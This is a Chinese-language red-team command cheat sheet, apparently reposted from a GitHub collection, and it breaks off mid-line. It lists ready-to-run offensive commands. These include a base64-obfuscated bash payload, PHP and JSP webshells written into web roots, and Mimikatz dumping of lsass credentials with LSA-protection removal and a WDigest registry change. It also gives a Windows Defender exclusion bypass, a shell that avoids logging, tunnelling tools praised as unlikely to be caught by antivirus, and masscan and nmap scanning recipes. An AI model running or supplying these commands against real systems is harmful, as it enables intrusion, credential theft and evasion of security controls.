红队常用命令速查_红队dump文件

原文参考链接：
https://github.com/safe6Sec/command

收集渗透中会用到的常用命令 。

建议直接[Ctrl+F]查找

java命令执行
http://www.jackson-t.ca/runtime-exec-payloads.html 已不能访问，使用如下网址代替
https://ares-x.com/tools/runtime-exec/
https://r0yanx.com/tools/java_exec_encode/
https://www.bugku.net/runtime-exec-payloads/

手动编码操作

bash -c {echo,cGluZyAxMjcuMC4wLjE7ZWNobyAxID50ZXN0LnR4dA==}|{base64,-d}|{bash,-i}
命令执行，定位资源文件写文件回显
Linux

find /|grep index.js|while read f;do sh -c “whoami” >$(dirname $f)/test.txt;done
Windows(注意盘符)

for /r D:\ %i in (index.js*) do whoami > %i/…/test.txt

写shell
在windows中，批处理需要转义字符主要有 “&”，“|”，“<”，“>”等等，转义字符为”^”
在Linux中，需要转义字符主要是 单引号 或者双引号 对于单引号，我们将其替换为\47即可。
windows命令行最大长度为8191,16进制长度是113898。echo写文件时注意长度。

方法1

set /p=qaxnbd:\1d13.txt
方法2

echo qaxnb>1we.txt
追加内容

echo qaxnb>>1we.txt
不换行追加

set /p=“121d2”>>a.txt
规避空格

echo.123>>a.txt
echo,123>>a.txt
type;a.txt
写特殊字符很多的文件，可以用certutil编码再还原。 如下还原

certutil -f -decode 111.txt C:\111.jsp
certutil -decodehex 111.txt C:\111.jsp
linux下base64

echo PD9waHAgZXZhbCgkX1BPU1Rbd2hvYW1pXSk7Pz4=|base64 -d > /var/www/html/shell.php
php的

echo <?php eval(@$_POST[1]); ?> >1.php
绕过空格

> < <> 重定向符
%09(需要php环境)
${IFS}
$IFS$9
{cat,flag.php}
%20
%09
nmap
nmap -sn 10.11.1.0/24
nmap -sV -p- 10.11.1.0
nmap 10.11.1.0 --script vuln
nmap -p445 10.11.1.0 --script smb-vuln-ms17-010
nmap -v -sn -PE -n --min-hostgroup 1024 --min-parallelism 1024 -oG tmp -iL ip.txt | awk '{print $5}' | grep -v "latency)." >ok_ip.txt
nmap 极速扫描，快如闪电
1
2
3
4
5
6
7
8
9
10
11
12
13
14

nmap -n --unique --resolve-all -Pn --min-hostgroup 64 --max-retries 0 --host-timeout 10m --script-timeout 3m -oX {filename} --version-intensity 9 --min-rate 10000 -T4 192.168.23.1
nmap -n --resolve-all -Pn --min-hostgroup 64 --max-retries 0 --host-timeout 10m --script-timeout 3m -oX {filename} --version-intensity 9 --min-rate 10000 -T4 192.168.23.1
获取http title

nmap -n --resolve-all -Pn --min-hostgroup --max-retries 3 --host-timeout 10m --script-timeout 3m --version-intensity 9 --min-rate 10000 --script=http-title -T4 -p- -iL domain.txt
masscan
注意速率问题,根据带宽调整。100m带宽可调3000,注意是vps，不是家庭宽带。

关于编译，直接git拉下来，make就行。生成的文件在bin下面。
扫描单ip

masscan 192.168.1.110 -p 1-65535 --rate=1000
扫描列表

masscan -iL ip.txt -p1-65535 --rate=1000 -oL port.txt
解析,提取ip:port

cat port.txt |awk ‘{print $4":"$3}’
转换为nmap可用端口

cat p.txt | tr “\n” ,
端口列表

22,23,135,445,389,3389,80,443,8080,7001,3306,1433,1521,6379,27017,2375,5900,5432,4899

21-23,80-90,135,137,161,389,443,445,873,1099,1433,1521,1900,2082,2083,2222,2375,2376,2601,2604,3128,3306,3311,3312,3389,4440,4848,5001,5432,5560,5900-5902,6082,6379,7001-7010,7778,8009,8080-8090,8649,8888,9000,9200,10000,11211,27017,28017,50000,51111,50030,50060

20-26,30,32-33,37,42-43,49,53,70,79-85,88-90,99-100,106,109-111,113,119,125,135,139,143-144,146,161,163,179,199,211-212,222,254-256,259,264,280,301,306,311,340,366,389,406-407,416-417,425,427,443-445,458,464-465,481,497,500,512-515,524,541,543-545,548,554-555,563,587,593,616-617,625,631,636,646,648,666-668,683,687,691,700,705,711,714,720,722,726,749,765,777,783,787,800-801,808,843,873,880,888,898,900-903,911-912,981,987,990,992-993,995,999-1002,1007,1009-1011,1021-1100,1102,1104-1108,1110-1114,1117,1119,1121-1124,1126,1130-1132,1137-1138,1141,1145,1147-1149,1151-1152,1154,1163-1166,1169,1174-1175,1183,1185-1187,1192,1198-1199,1201,1213,1216-1218,1233-1234,1236,1244,1247-1248,1259,1271-1272,1277,1287,1296,1300-1301,1309-1311,1322,1328,1334,1352,1417,1433-1434,1443,1455,1461,1494,1500-1501,1503,1521,1524,1533,1556,1580,1583,1594,1600,1641,1658,1666,1687-1688,1700,1717-1721,1723,1755,1761,1782-1783,1801,1805,1812,1839-1840,1862-1864,1875,1900,1914,1935,1947,1971-1972,1974,1984,1998-2010,2013,2020-2022,2030,2033-2035,2038,2040-2043,2045-2049,2065,2068,2099-2100,2103,2105-2107,2111,2119,2121,2126,2135,2144,2160-2161,2170,2179,2190-2191,2196,2200,2222,2251,2260,2288,2301,2323,2366,2381-2383,2393-2394,2399,2401,2492,2500,2522,2525,2557,2601-2602,2604-2605,2607-2608,2638,2701-2702,2710,2717-2718,2725,2800,2809,2811,2869,2875,2909-2910,2920,2967-2968,2998,3000-3001,3003,3005-3007,3011,3013,3017,3030-3031,3052,3071,3077,3128,3168,3211,3221,3260-3261,3268-3269,3283,3300-3301,3306,3322-3325,3333,3351,3367,3369-3372,3389-3390,3404,3476,3493,3517,3527,3546,3551,3580,3659,3689-3690,3703,3737,3766,3784,3800-3801,3809,3814,3826-3828,3851,3869,3871,3878,3880,3889,3905,3914,3918,3920,3945,3971,3986,3995,3998,4000-4006,4045,4111,4125-4126,4129,4224,4242,4279,4321,4343,4443-4446,4449,4550,4567,4662,4848,4899-4900,4998,5000-5004,5009,5030,5033,5050-5051,5054,5060-5061,5080,5087,5100-5102,5120,5190,5200,5214,5221-5222,5225-5226,5269,5280,5298,5357,5405,5414,5431-5432,5440,5500,5510,5544,5550,5555,5560,5566,5631,5633,5666,5678-5679,5718,5730,5800-5802,5810-5811,5815,5822,5825,5850,5859,5862,5877,5900-5904,5906-5907,5910-5911,5915,5922,5925,5950,5952,5959-5963,5987-5989,5998-6007,6009,6025,6059,6100-6101,6106,6112,6123,6129,6156,6346,6389,6502,6510,6543,6547,6565-6567,6580,6646,6666-6669,6689,6692,6699,6779,6788-6789,6792,6839,6881,6901,6969,7000-7002,7004,7007,7019,7025,7070,7100,7103,7106,7200-7201,7402,7435,7443,7496,7512,7625,7627,7676,7741,7777-7778,7800,7911,7920-7921,7937-7938,7999-8002,8007-8011,8021-8022,8031,8042,8045,8080-8090,8093,8099-8100,8180-8181,8192-8194,8200,8222,8254,8290-8292,8300,8333,8383,8400,8402,8443,8500,8600,8649,8651-8652,8654,8701,8800,8873,8888,8899,8994,9000-9003,9009-9011,9040,9050,9071,9080-9081,9090-9091,9099-9103,9110-9111,9200,9207,9220,9290,9415,9418,9485,9500,9502-9503,9535,9575,9593-9595,9618,9666,9876-9878,9898,9900,9917,9929,9943-9944,9968,9998-10004,10009-10010,10012,10024-10025,10082,10180,10215,10243,10566,10616-10617,10621,10626,10628-10629,10778,11110-11111,11967,12000,12174,12265,12345,13456,13722,13782-13783,14000,14238,14441-14442,15000,15002-15004,15660,15742,16000-16001,16012,16016,16018,16080,16113,16992-16993,17877,17988,18040,18101,18988,19101,19283,19315,19350,19780,19801,19842,20000,20005,20031,20221-20222,20828,21571,22939,23502,24444,24800,25734-25735,26214,27000,27352-27353,27355-27356,27715,28201,30000,30718,30951,31038,31337,32768-32785,33354,33899,34571-34573,35500,38292,40193,40911,41511,42510,44176,44442-44443,44501,45100,48080,49152-49161,49163,49165,49167,49175-49176,49400,49999-50003,50006,50050,50300,50389,50500,50636,50800,51111,51103,51493,52673,52822,52848,52869,54045,54328,55055-55056,55555,55600,56737-56738,57294,57797,58080,60020,60443,61532,61900,62078,63331,64623,64680,65000,65129,65389
1
2
3
4
5

字典
top200
Mimikatz
一条命令

.\mimikatz “privilege::debug” “sekurlsa::logonpasswords” exit
控制台执行多条命令，用log防止进程崩溃，数据丢失

mimikatz # privilege::debug
mimikatz # log
mimikatz # sekurlsa::logonpasswords
mimikatz # sekurlsa::wdigest
msf中执行命令

mimikatz_command -f sekurlsa::logonPasswords full
mimikatz_command -f sekurlsa::wdigest
注册表开启wdigest,08r2后默认关闭。需要目标注销，重新登录。2016需要重启。

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /f /d 1
bypass lsa Protection(ppl)
查询是否启用

reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa

把mimidriver.sys拷贝到同级目录，进行加载bypass

mimikatz # !+
mimikatz # !processprotect /process:lsass.exe /remove
mimikatz # privilege::debug
mimikatz # token::elevate
mimikatz # sekurlsa::logonpasswords
mimikatz # !processprotect /process:lsass.exe
mimikatz # !-
cs凭证解析
提取用户名

awk -F":::" ‘{print $1}’ credentials.txt | awk -F"\" ‘{print $2}’
提取hash

awk -F":::" ‘{print $2}’ credentials.txt
存活主机
for /L %I in (1,1,256) DO @ping -w 1 -l 1 192.168.202.%I | findstr “TTL=”
bypass
Defender排除项

powershell -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath “C:\test”

gobuster
gobuster dir -u https://buffered.io -w ~/wordlists/shortlist.txt
dirsearch
python3 dirsearch.py -e php,html,js -u https://target
python3 dirsearch.py -e php,html,js -u https://target -w /path/to/wordlist
python3 dirsearch.py -e php,htm,js,bak,zip,tgz,txt -u https://target -t 20
python3 dirsearch.py -e php,html,js -u https://target --proxy 127.0.0.1:8080
python3 dirsearch.py -e php,html,js -u https://target --proxy socks5://10.10.0.1:8080
nbtscan
nbtscan.exe 10.11.1.0/24
代理工具
proxychain
sockscap64
proxifier

https://drive.google.com/drive/folders/1x5naJeK2YkV6QCYUlUg5QNMl1Izf4-ti
https://www.mediafire.com/folder/32rj1769a2w82/v4.7

内网穿透工具
fuso
https://github.com/editso/fuso.git
相对冷门，不会被杀 在9004上开启socks5代理
fuc.exe 159.138.0.0 9003 -h 127.0.0.1 -p 9004 -b 9004 -n test -t socks5 --bridge-host 0.0.0.0 --bridge-port 9004
frp
nps
https://github.com/ehang-io/nps

sudo ./nps install
sudo nps start
安装后配置文件位置/etc/nps，默认密码(可在配置文件里面修改)admin/123

iox
Stowaway
https://github.com/lz520520/Stowaway

Venom
https://github.com/Dliv3/Venom

ssh
无记录shell

ssh -T root@192.168.1.1 /usr/bin/bash -i
grep
grep -E “([0-9]{1,3}[.]){3}[0-9]{1,3}” -r xxx --color=auto
grep -E “https?